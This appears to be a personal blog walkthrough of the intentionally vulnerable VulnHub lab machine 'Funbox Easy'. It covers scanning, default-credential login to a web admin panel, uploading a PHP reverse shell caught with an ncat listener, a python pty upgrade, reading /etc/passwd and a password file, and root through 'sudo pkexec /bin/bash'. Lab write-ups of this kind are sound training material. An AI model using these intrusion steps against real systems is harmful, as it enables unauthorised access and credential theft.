How to hack into Funbox Easy from VulHub

First Time hacking into a system!

Oct 28, 2022 13:00 · liucreator

Table of Contents

Setting up Target System
Scan Network

https://www.vulnhub.com/entry/funbox-easy,526/

Setting up Target System

extract the ova file using tar -xvf Funbox3.ova, there will be a vmdk file(VMware Disk image) in it
and then convert to qcow2 using qemu-img convert -p -f vmdk -O qcow2 Funbox3-disk001.vmdk funbox3.qcow2
create a new vm, using existing image, and import that funbox3.qcow2
make sure it is using BIOS boot, UEFI didn’t work

Scan Network

Get target IP

nmap -sn 192.168.122.1-255 ping scan
netdiscover -P -i eth0 -r 192.168.122.1/24

Scan Ports

nmap -p- -sV -sC 192.168.122.14

Port 80 http is Open

check the website
check robots.txt
Inspect elements
dirb http://192.168.122.14 scan directories
- found:
  - http://192.168.122.14/index.php
  - http://192.168.122.14/admin/index.php
  - http://192.168.122.14/store/admin.php
- try default login “admin admin”, and able to get into book store backend

Website is running PHP, so we can try to use php script to get a reverse webshell

updatedb && locate php-reverse-shell.php
found /usr/share/webshells/php/php-reverse-shell.php
copy it to somewhere else, edit the IP to attacker’s and port to anything
open a listening port with attacker on that port ncat -nvlp 314
add a new book http://192.168.122.14/store/admin_add.phpand drop in the php-reverse-shell.php
Now we have a revese shell when we open the new book

Spawn a better shell

check if python exist on machine which python3
spawn a new bash shell python3 -c 'import pty;pty.spawn("/bin/bash")'
now we have a proper bash shell

Now we are in that system shell, gather some info

uname -a check OS version
whoami find out current user
id find user and group id
find out all users on machine, check /etc/passwd
check out other user tony ’s home
found out a password.txt file that is readible by all users

Try the passwords

able to login to http://192.168.122.14/admin/home.php with admin asdfghjklXXX
able to SSH into the machine with tony yxcvbnmYYY

SSH into the machine

check out current user’s group groups tony
or id
User is in sudoer group
check all commands for sudo -l
try to look up possible privilage esculation from: https://gtfobins.github.io/:
- pkexec and time could work
- sudo pkexec /bin/bash will spawn a shell

Capture the Flag

Now you are in Bash as root, go to /root
cat /root/root.flag